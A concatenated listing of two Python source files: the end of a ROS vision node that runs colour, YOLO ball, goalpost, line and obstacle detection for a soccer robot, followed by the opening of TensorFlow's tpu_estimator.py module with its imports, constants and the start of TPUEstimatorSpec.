if self._sub_dynamic_color_lookup_table_msg_topic is not None:
# self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work
self._sub_dynamic_color_lookup_table_msg_topic = None
# Set the static field color detector
self._field_color_detector = color.PixelListColorDetector(
config,
self._package_path)
# Check if params changed
if ros_utils.config_param_change(self._config, config,
r'^field_color_detector_|field_color_detector_use_hsv') and config['field_color_detector_use_hsv']:
# Unregister old subscriber
if self._sub_dynamic_color_lookup_table_msg_topic is not None:
# self._sub_dynamic_color_lookup_table_msg_topic.unregister() # Do not use this method, does not work
self._sub_dynamic_color_lookup_table_msg_topic = None
# Override field color hsv detector
self._field_color_detector = color.HsvSpaceColorDetector(config, "field")
# Get field boundary detector class by name from _config
field_boundary_detector_class = field_boundary.FieldBoundaryDetector.get_by_name(
config['field_boundary_detector_search_method'])
# Set the field boundary detector
self._field_boundary_detector = field_boundary_detector_class(
config,
self._field_color_detector)
# Set the line detector
self._line_detector = lines.LineDetector(
config,
self._white_color_detector,
self._field_color_detector,
self._field_boundary_detector)
# Set the obstacle detector
self._obstacle_detector = obstacle.ObstacleDetector(
config,
self._field_boundary_detector)
# If dummy ball detection is activated, set the dummy ballfinder as ball detector
if config['neural_network_type'] == 'dummy':
self._ball_detector = candidate.DummyCandidateFinder()
# If we don't use YOLO set the conventional goalpost detector.
self._goalpost_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._white_color_detector,
threshold=config['obstacle_color_threshold'])
'''
# Check if the fcnn is activated
if config['neural_network_type'] == 'fcnn':
# Check if its the first callback, the fcnn is newly activated or the model has changed
if ros_utils.config_param_change(self._config, config, ['fcnn_model_path', 'neural_network_type']):
# Build absolute model path
ball_fcnn_path = os.path.join(self._package_path, 'models', config['fcnn_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(ball_fcnn_path, "model_final.index")):
rospy.logerr('AAAAHHHH! The specified fcnn model file doesn\'t exist! Maybe its a YOLO model? Look twice.', logger_name="vision_fcnn")
else:
self._ball_fcnn = live_fcnn_03.FCNN03(ball_fcnn_path)
rospy.loginfo("FCNN vision is running now", logger_name="vision_fcnn")
#Check if ball_fcnn _config or the neural network type has changed
if ros_utils.config_param_change(self._config, config, r'^ball_fcnn_') or \
ros_utils.config_param_change(self._config, config, 'neural_network_type'):
# Set fcnn handler
self._ball_detector = fcnn_handler.FcnnHandler(
config,
self._ball_fcnn)
# When using the FCNN, set the conventional goalpost detector.
self._goalpost_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._white_color_detector,
threshold=config['obstacle_color_threshold'])
'''
# Check if the yolo ball/goalpost detector is activated and if the non tpu version is used
if config['neural_network_type'] in ['yolo_opencv', 'yolo_darknet']:
if ros_utils.config_param_change(self._config, config, ['yolo_darknet_model_path', 'neural_network_type']):
# Build absolute model path
yolo_darknet_model_path = os.path.join(self._package_path, 'models', config['yolo_darknet_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(yolo_darknet_model_path, "yolo_weights.weights")):
rospy.logerr('The specified yolo darknet model file doesn\'t exist! Maybe its a fcnn model?', logger_name="vision_yolo")
else:
# Decide which yolo implementation should be used
if config['neural_network_type'] == 'yolo_opencv':
# Load OpenCV implementation (uses OpenCL)
self._yolo = yolo_handler.YoloHandlerOpenCV(config, yolo_darknet_model_path)
elif config['neural_network_type'] == 'yolo_darknet':
# Load Darknet implementation (uses CUDA)
self._yolo = yolo_handler.YoloHandlerDarknet(config, yolo_darknet_model_path)
rospy.loginfo(config['neural_network_type'] + " vision is running now", logger_name="vision_yolo")
# For other changes only modify the config
elif ros_utils.config_param_change(self._config, config, r'yolo_'):
self._yolo.set_config(config)
# Set both ball and goalpost detector
self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)
self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)
# Check if we use the yolo robot detection
if "robot" in self._yolo.get_classes():
self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)
# Check if tpu version of yolo ball/goalpost detector is used
if config['neural_network_type'] in ['yolo_ncs2']:
if ros_utils.config_param_change(self._config, config, ['neural_network_type', 'yolo_openvino_model_path']):
# Build absolute model path
yolo_openvino_model_path = os.path.join(self._package_path, 'models', config['yolo_openvino_model_path'])
# Check if it exists
if not os.path.exists(os.path.join(yolo_openvino_model_path, "yolo.bin")) \
or not os.path.exists(os.path.join(yolo_openvino_model_path, "yolo.xml")):
rospy.logerr('The specified yolo openvino model file doesn\'t exist! Maybe its a fcnn model?', logger_name="vision_yolo")
else:
self._yolo = yolo_handler.YoloHandlerNCS2(config, yolo_openvino_model_path)
rospy.loginfo(config['neural_network_type'] + " vision is running now", logger_name="vision_yolo")
# For other changes only modify the config
elif ros_utils.config_param_change(self._config, config, r'yolo_'):
self._yolo.set_config(config)
# Set both ball and goalpost detector
self._ball_detector = yolo_handler.YoloBallDetector(config, self._yolo)
self._goalpost_detector = yolo_handler.YoloGoalpostDetector(config, self._yolo)
# Check if we use the yolo robot detection
if "robot" in self._yolo.get_classes():
self._obstacle_detector = yolo_handler.YoloRobotDetector(config, self._yolo)
# Set the other obstacle detectors
self._red_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._red_color_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._goalpost_detector])
self._blue_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
self._blue_color_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._red_obstacle_detector, self._goalpost_detector])
self._unknown_obstacle_detector = obstacle.ColorObstacleDetector(
self._obstacle_detector,
threshold=config['obstacle_color_threshold'],
subtractors=[self._red_obstacle_detector, self._blue_obstacle_detector, self._goalpost_detector])
self._register_or_update_all_subscribers(config)
# Define Modules that should run their calculations (modules should exist, therefore its located here)
self._conventional_modules = [
self._field_color_detector,
self._white_color_detector,
self._red_color_detector,
self._blue_color_detector,
self._unknown_obstacle_detector,
self._obstacle_detector,
self._line_detector,
]
# Publish Config-message (mainly for the dynamic color lookup table node)
ros_utils.publish_vision_config(config, self._pub_config)
# The old _config gets replaced with the new _config
self._config = config
def _register_or_update_all_publishers(self, config):
# type: (dict) -> None
"""
This method registers all publishers needed for the vision node.
Allways create a placeholder for each publisher in init
:param dict config: new, incoming _config
:return: None
"""
self._pub_audio = ros_utils.create_or_update_publisher(self._config, config, self._pub_audio, 'ROS_audio_msg_topic', Audio, queue_size=10)
self._pub_balls = ros_utils.create_or_update_publisher(self._config, config, self._pub_balls, 'ROS_ball_msg_topic', BallInImageArray)
self._pub_lines = ros_utils.create_or_update_publisher(self._config, config, self._pub_lines, 'ROS_line_msg_topic', LineInformationInImage, queue_size=5)
self._pub_line_mask = ros_utils.create_or_update_publisher(self._config, config, self._pub_line_mask, 'ROS_line_mask_msg_topic', Image)
self._pub_obstacle = ros_utils.create_or_update_publisher(self._config, config, self._pub_obstacle, 'ROS_obstacle_msg_topic', ObstacleInImageArray, queue_size=3)
self._pub_goal_posts = ros_utils.create_or_update_publisher(self._config, config, self._pub_goal_posts, 'ROS_goal_posts_msg_topic', GoalPostInImageArray, queue_size=3)
#self._pub_ball_fcnn = ros_utils.create_or_update_publisher(self._config, config, self._pub_ball_fcnn, 'ROS_fcnn_img_msg_topic', RegionOfInterestWithImage)
self._pub_debug_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_debug_image, 'ROS_debug_image_msg_topic', Image)
self._pub_convex_field_boundary = ros_utils.create_or_update_publisher(self._config, config, self._pub_convex_field_boundary, 'ROS_field_boundary_msg_topic', PolygonStamped)
#self._pub_debug_fcnn_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_debug_fcnn_image, 'ROS_debug_fcnn_image_msg_topic', Image)
self._pub_white_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_white_mask_image, 'ROS_white_HSV_mask_image_msg_topic', Image)
self._pub_red_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_red_mask_image, 'ROS_red_HSV_mask_image_msg_topic', Image)
self._pub_blue_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_blue_mask_image, 'ROS_blue_HSV_mask_image_msg_topic', Image)
self._pub_field_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_field_mask_image, 'ROS_field_mask_image_msg_topic', Image)
self._pub_dynamic_color_lookup_table_field_mask_image = ros_utils.create_or_update_publisher(self._config, config, self._pub_dynamic_color_lookup_table_field_mask_image, 'ROS_dynamic_color_lookup_table_field_mask_image_msg_topic', Image)
def _register_or_update_all_subscribers(self, config):
# type: (dict) -> None
"""
This method registers all subscribers needed for the vision node.
:param dict config: new, incoming _config
:return: None
"""
self._sub_image = ros_utils.create_or_update_subscriber(self._config, config, self._sub_image, 'ROS_img_msg_topic', Image, callback=self._image_callback, queue_size=config['ROS_img_msg_queue_size'], buff_size=60000000) # https://github.com/ros/ros_comm/issues/536
if isinstance(self._field_color_detector, color.DynamicPixelListColorDetector):
self._sub_dynamic_color_lookup_table_msg_topic = ros_utils.create_or_update_subscriber(self._config, config, self._sub_dynamic_color_lookup_table_msg_topic, 'ROS_dynamic_color_lookup_table_msg_topic', ColorLookupTable, callback=self._field_color_detector.color_lookup_table_callback, queue_size=1, buff_size=2 ** 20)
def _image_callback(self, image_msg):
# type: (Image) -> None
"""
This method is called by the Image-message subscriber.
Old Image-messages were dropped.
Sometimes the queue gets to large, even when the size is limited to 1.
That's, why we drop old images manually.
"""
# Drops old images and cleans up the queue.
# Still accepts very old images, that are most likely from ROS bags.
image_age = rospy.get_rostime() - image_msg.header.stamp
if 1.0 < image_age.to_sec() < 1000.0:
rospy.logwarn(f"Vision: Dropped incoming Image-message, because its too old! ({image_age.to_sec()} sec)",
logger_name="vision")
return
if self._transfer_image_msg_mutex.locked():
return
with self._transfer_image_msg_mutex:
# Transfer the image to the main thread
self._transfer_image_msg = image_msg
def _handle_image(self, image_msg):
"""
Runs the vision pipeline
:param image_msg: Image message provided by ROS
"""
# converting the ROS image message to CV2-image
image = self._cv_bridge.imgmsg_to_cv2(image_msg, 'bgr8')
# Skip if image is None
if image is None:
rospy.logdebug("Image content is None :(", logger_name="vision")
return
# Check if its the first image callback
if self._first_image_callback:
# Check if a cap may be on the camera
self._handle_forgotten_camera_cap(image)
# Instances that should be notified with the new image
internal_image_subscribers =[
self._field_color_detector,
self._white_color_detector,
self._red_color_detector,
self._blue_color_detector,
self._unknown_obstacle_detector,
self._field_boundary_detector,
self._obstacle_detector,
self._red_obstacle_detector,
self._blue_obstacle_detector,
self._goalpost_detector,
self._line_detector,
self._ball_detector,
self._debug_image_creator,
]
# Distribute the image to the detectors
# Iterate over subscribers
for vision_object in internal_image_subscribers:
# Send image
vision_object.set_image(image)
# Check if the vision should run the conventional and neural net part parallel
if self._config['vision_parallelize']:
# Create and start threads for conventional calculation and neural net
#fcnn_thread = Thread(target=self._ball_detector.compute)
conventional_thread = Thread(target=self._conventional_precalculation())
conventional_thread.start()
#fcnn_thread.start()
# Wait for both threads
conventional_thread.join()
#fcnn_thread.join()
else:
# Calc conventional calculation and neural net
self._ball_detector.compute()
self._conventional_precalculation()
########
# Ball #
########
# Get a number of top balls under the field boundary, which have an high enough rating
all_balls = self._ball_detector.get_top_candidates(count=self._max_balls)
balls_under_field_boundary = \
self._field_boundary_detector.candidates_under_convex_field_boundary(
all_balls,
self._ball_candidate_y_offset)
top_balls = candidate.Candidate.rating_threshold(
balls_under_field_boundary,
self._ball_candidate_threshold)
# check whether there are ball candidates
if top_balls:
# Convert ball cancidate list to ball message list
list_of_balls = map(ros_utils.build_ball_msg, top_balls)
# Create balls msg with the list of balls
balls_msg = ros_utils.build_balls_msg(image_msg.header, list_of_balls)
# Publish balls
self._pub_balls.publish(balls_msg)
# Debug draw all ball candidates
self._debug_image_creator.draw_ball_candidates(
all_balls,
(0, 0, 255))
# Debug draw possible ball candidates under the field boundary
self._debug_image_creator.draw_ball_candidates(
balls_under_field_boundary,
(0, 255, 255))
# Debug draw top ball candidate
self._debug_image_creator.draw_ball_candidates(
top_balls,
(0, 255, 0),
thickness=2)
#############
# Obstacles #
#############
# Init list for obstacle msgs
list_of_obstacle_msgs = []
# Add red obstacles
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.ROBOT_MAGENTA,
self._red_obstacle_detector.get_candidates()))
# Add blue obstacles
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.ROBOT_CYAN,
self._blue_obstacle_detector.get_candidates()))
# Add UFO's (Undefined Found Obstacles)
list_of_obstacle_msgs.extend(ros_utils.build_obstacle_msgs(ObstacleInImage.UNDEFINED,
self._unknown_obstacle_detector.get_candidates()))
# Build obstacles msgs containing all obstacles
obstacles_msg = ros_utils.build_obstacle_array_msg(image_msg.header, list_of_obstacle_msgs)
# Publish obstacles
self._pub_obstacle.publish(obstacles_msg)
# Debug draw unknown obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._unknown_obstacle_detector.get_candidates(),
(0, 0, 0),
thickness=3)
# Debug draw red obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._red_obstacle_detector.get_candidates(),
(0, 0, 255),
thickness=3)
# Debug draw blue obstacles
self._debug_image_creator.draw_obstacle_candidates(
self._blue_obstacle_detector.get_candidates(),
(255, 0, 0),
thickness=3)
########
# Goal #
########
# Get all goalposts under field boundary
goal_posts = self._field_boundary_detector.candidates_under_convex_field_boundary(
self._goalpost_detector.get_candidates(),
self._goal_post_field_boundary_y_offset)
# Get goalpost msgs and add them to the detected goal posts list
goal_post_msgs = ros_utils.build_goal_post_msgs(goal_posts)
# Create goalposts msg
goal_posts_msg = ros_utils.build_goal_post_array_msg(image_msg.header, goal_post_msgs)
# Check if there is a goal
if goal_posts_msg:
# If we have a goal, lets publish it
self._pub_goal_posts.publish(goal_posts_msg)
# Debug draw all goal posts
self._debug_image_creator.draw_obstacle_candidates(
self._goalpost_detector.get_candidates(),
(180, 180, 180),
thickness=3)
# Debug draw goal posts which start in the field
self._debug_image_creator.draw_obstacle_candidates(
goal_posts,
(255, 255, 255),
thickness=3)
#########
# Lines #
#########
if self._use_line_points:
# Build a LineSegmentInImage message for each linepoint
line_points = self._line_detector.get_linepoints()
# Create line segments
line_segments = ros_utils.convert_line_points_to_line_segment_msgs(line_points)
# Create line msg
line_msg = ros_utils.build_line_information_in_image_msg(image_msg.header, line_segments)
# Publish lines
self._pub_lines.publish(line_msg)
# Draw debug line points
self._debug_image_creator.draw_points(
line_points,
(0, 0, 255))
if self._use_line_mask:
# Define detections (Balls, Goal Posts) that are excluded from the line mask
excluded_objects = top_balls + goal_posts
# Get line pixel mask
line_mask = self._line_detector.get_line_mask_without_other_objects(excluded_objects)
# Create line mask message
line_mask_message = ros_utils.build_image_msg(image_msg.header, line_mask, '8UC1')
# Publish line mask
self._pub_line_mask.publish(line_mask_message)
# Draw debug line mask
self._debug_image_creator.draw_mask(
line_mask,
color=(255, 0, 0),
opacity=0.8)
##################
# Field boundary #
##################
# Get field boundary msg
convex_field_boundary = self._field_boundary_detector.get_convex_field_boundary_points()
# Build ros message
convex_field_boundary_msg = ros_utils.build_field_boundary_polygon_msg(image_msg.header, convex_field_boundary)
# Publish field boundary
self._pub_convex_field_boundary.publish(convex_field_boundary_msg)
# Debug draw convex field boundary
self._debug_image_creator.draw_field_boundary(
convex_field_boundary,
(0, 255, 255))
# Debug draw field boundary
self._debug_image_creator.draw_field_boundary(
self._field_boundary_detector.get_field_boundary_points(),
(0, 0, 255))
#########
# Debug #
#########
'''
if self._config['neural_network_type'] == 'fcnn':
# Publish fcnn output for the region of interest under the field boundary (for the world model)
if self._ball_fcnn_publish_output:
roi_msg = ros_utils.build_fcnn_region_of_interest(
self._ball_detector.get_fcnn_output(),
self._field_boundary_detector,
image_msg.header,
self._config['ball_fcnn_publish_field_boundary_offset'])
self._pub_ball_fcnn.publish(roi_msg)
# Publish whole fcnn output for debug purposes
if self._publish_fcnn_debug_image:
self._pub_debug_fcnn_image.publish(self._ball_detector.get_debug_image())
'''
# Check, if HSV mask images should be published
if self._publish_HSV_mask_image:
# Mask images
white_mask = self._white_color_detector.get_mask_image()
red_mask = self._red_color_detector.get_mask_image()
blue_mask = self._blue_color_detector.get_mask_image()
# Publish mask images
self._pub_white_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, white_mask, '8UC1'))
self._pub_red_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, red_mask, '8UC1'))
self._pub_blue_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, blue_mask, '8UC1'))
# Check, if field mask image should be published
if self._publish_field_mask_image:
if isinstance(self._field_color_detector, color.DynamicPixelListColorDetector):
# Mask image
dyn_field_mask = self._field_color_detector.get_mask_image()
static_field_mask = self._field_color_detector.get_static_mask_image()
# Publish mask image
self._pub_dynamic_color_lookup_table_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, dyn_field_mask, '8UC1'))
self._pub_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, static_field_mask, '8UC1'))
else:
# Mask image
field_mask = self._field_color_detector.get_mask_image()
# Publish mask image
self._pub_field_mask_image.publish(
ros_utils.build_image_msg(image_msg.header, field_mask, '8UC1'))
# Check if we should draw debug image
if self._debug_image_creator.active:
# publish debug image
self._pub_debug_image.publish(
ros_utils.build_image_msg(
image_msg.header,
self._debug_image_creator.get_image(),
'bgr8'))
def _conventional_precalculation(self):
"""
Starts the conventional calculations
"""
# Run all modules
for module in self._conventional_modules:
module.compute()
def _handle_forgotten_camera_cap(self, image):
# type: (np.array) -> None
"""
Detects a forgotten cap on the camera and notifies this via speech
:param image: Image
"""
# Calc the mean brightness of the image to detect a forgotten camera cap
mean = cv2.mean(image)
# Notify if there is a camera cap detected
if sum(mean) < self._blind_threshold:
rospy.logerr("Image is too dark! Camera cap not removed?", logger_name="vision")
ros_utils.speak("Hey! Remove my camera cap!", self._pub_audio)
if __name__ == '__main__':
Vision()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
if ops.get_to_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
